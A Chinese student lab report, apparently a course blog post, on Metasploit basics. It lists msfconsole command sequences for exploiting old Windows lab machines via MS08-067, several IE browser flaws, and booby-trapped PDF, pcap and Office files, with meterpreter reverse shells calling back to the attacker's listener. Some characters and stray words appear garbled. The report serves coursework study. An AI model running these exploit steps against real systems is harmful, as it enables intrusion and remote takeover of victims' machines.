2019-2020-2 网络对抗技术 20175206李得琛 Exp6 MSF基础应用

实践基础知识

1.模块:
模块是指Metasploit框架中所使用的一段软件代码组件,查看六种模块源码目录/usr/share/metasploit-framework/modules
共六个模块:html

渗透攻击模块;
辅助模块;
攻击载荷;
空字段模块;
编码模块;
后渗透攻击模块;

2.用户操做界面:web

msfconsole
armitage
webgui

3.攻击方式shell

主动攻击:直接攻击系统开启的漏洞服务,获取系统控制权
攻击浏览器,获取系统控制权
攻击客户端应用,获取系统控制权
本地提权

4.使用命令windows

search name:用指定关键字搜索能够利用的漏洞模块
use exploit name:使用漏洞
show options:显示配置选项
set option name option:设置选项
show payloads:回链攻击载荷
show targets: 显示目标(os版本)
set TARGET target number:设置目标版本
exploit:开始漏洞攻击
sessions -l:列出会话
sessions -i id:选择会话
sessions -k id:结束会话
Ctrl+z:把会话放到后台
Ctrl+c:结束会话
show auxiliary:显示辅助模块
use auxiliary name:使用辅助模块
set option name option:设置选项
exploit:运行模块

实践内容

任务一:主动攻击实践
任务二:一个针对浏览器的攻击
任务三:一个针对客户端的攻击
任务四:成功应用任何一个辅助模块api

实践过程

任务一:主动攻击实践

1.MS08_067自动化漏洞
攻击机IP:kali 192.168.64.144
靶机:Win2000 192.168.64.166
输入msfconsole进入控制台,依次输入如下指令:浏览器

use exploit/windows/smb/ms08_067_netapi;
show payloads;
set payload generic/shell_reverse_tcp ;//回连
set LHOST 192.168.64.144
set LPORT 5206
set RHOST 192.168.64.166
set target 0
exploit


任务二:一个针对浏览器的攻击

1.针对浏览器的攻击MS11-050
攻击机IP:kali 192.168.64.144
靶机:Win2000 192.168.64.166
输入msfconsole进入控制台,依次输入如下指令:session

use windows/browser/ms11_050_mshtml_cobjectelement;
set payload windows/meterpreter/reverse_http
set LHOST 192.168.64.144
set LPORT 5206
set RHOST 192.168.64.166
set URIPATH ldc20175206
exploit



攻击失败,靶机没法找到该网页,攻击机出现错误字样。框架

2.针对浏览器的攻击MS10_018
攻击机IP:kali 192.168.64.144
靶机:WinXP 192.168.64.165
输入msfconsole进入控制台,依次输入如下指令:tcp

use windows/browser/ms10_018_ie_behaviors;
set payload windows/meterpreter/bind_tcp
set LHOST 192.168.64.144
set LPORT 5206
set RHOST 192.168.64.165
set URIPATH 20175206ldc
exploit


攻击成功!出现suceesfully字样。工具

3.针对浏览器的攻击MS06-013(惟一)
输入命令serach browser查看漏洞:

选取漏洞进行攻击
攻击机IP:kali 192.168.64.144
靶机:Win2008 192.168.64.165
输入msfconsole进入控制台,依次输入如下指令:

use windows/browser/ms06_013_createtextrange;
set SRVHOST 192.168.64.144
set URIPATH 66666
exploit


攻击成功!发送代码1-100!

任务三:一个针对客户端的攻击

攻击机IP:kali 192.168.64.144
靶机:WinXP 192.168.64.136
Adobe:
在msfconsle中输入命令:

use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp //tcp反向回连
set LHOST 192.168.64.144
set LPORT 5206
set FILENAME ldc20175206.pdf
exploit //攻击

咱们发现建立的PDF文件生成位置:


copy到靶机中并打开:
在攻击机中输入:

use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //tcp反向链接
set LHOST 192.168.64.144 //攻击机ip
set LPORT 5206 //攻击端口固定
exploit


虽然没有打开pdf,可是已经获得回连显示,输入dir便可成功得到回连!

任务四:成功应用任何一个辅助模块

攻击机IP:kali 192.168.64.144
靶机:WinXP 192.168.64.136
这里在试验了多个漏洞以后,发现仍是针对wireshark的攻击较为方便,由于wireshark以前在XP中已有安装。
wireshark pcap攻击
输入msfconsole进入控制台,依次输入如下指令:

msfconsole //进入控制台
use exploit/windows/fileformat/wireshark_packet_dect.rb
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.64.144
set LPORT 5206
set FILENAME ldc20175206.pcap
show options
exploit


而后back回基础界面,输入下列命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.64.144
set LPORT 5206
exploit

在靶机中打开咱们传入的pcap文件,便可获得回显!

虽然打开仍是没有相应,可是咱们经过攻击机的现象已经了解到攻击成功!

再来一个office的攻击:
攻击机IP:kali 192.168.64.144
靶机:WinXP 192.168.64.136
和以前同样输入命令

use windows/fileformat/ms11_006_createsizeddibsection
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.64.144
set LPORT 5206
set FILENAME ldc20175206.pcap
show options
exploit

将生成的doc传到靶机中,开始监控,便可获得现象!如图,成功获得回显!

实验成功!

实践问题

基础问题回答

(1)用本身的话解释什么是exploit,payload,encode。
exploit:攻击模块,是利用靶机的系统漏洞进行攻击的模块。
payload:载荷模块,是传输攻击所用的代码和数据的模块。
encode:编码模块,是用来对攻击代码编译更新的模块。

(2)离实战还缺些什么技术或步骤?
从本次实验中就能够看出来,咱们进行渗透的时候,发现版本都是一些旧的,或者是被淘汰和即将被淘汰的版本(指已经不是主流使用版本),这样实用性就变得很是的弱。并且即使是win XP系统,咱们也须要让系统的防火墙关闭才能进行系统的攻击。而实际攻击状况下,系统须要是最新的版本,防火墙也是最新的,对漏洞的种类更新应该已经齐全。其次,防火墙不是关闭的而是开启着的,咱们的渗透攻击没法跨过防火墙。这么看来,咱们距离实战还有很长的一段路要走,最起码以如今的程度就不要称本身是在搞渗透了,咱们还应该继续深刻研究每一个版本,寻找其漏洞进行分析和处理,以更好的保护咱们的系统,修复漏洞,防止有心人利用这些漏洞作非法的事情,对咱们形成巨大的损失。

实验总结与体会

  • 总结与体会 本次实验对靶机版本的要求异常的苛刻,windows有些版本有时候会出现攻击失败的状况,这从侧面说明了攻击是时使用的工具局限性。每次攻击失败老是让我极为的头疼,为此我把我全部的windows版本的虚拟机都当作靶机进行处理和攻击,主机win10没有进行攻击,由于经过info查看漏洞适用范围连win10的影子的没见,就没有使用win10系统。看了以前学长学姐的博客,发现主要仍是集中于win2000,XP等老旧版本,虽然版本比较老旧,可是也能够做为渗透经验进行积累,根据现象进行分析,争取早日达到实战的效果。
相关文章
相关标签/搜索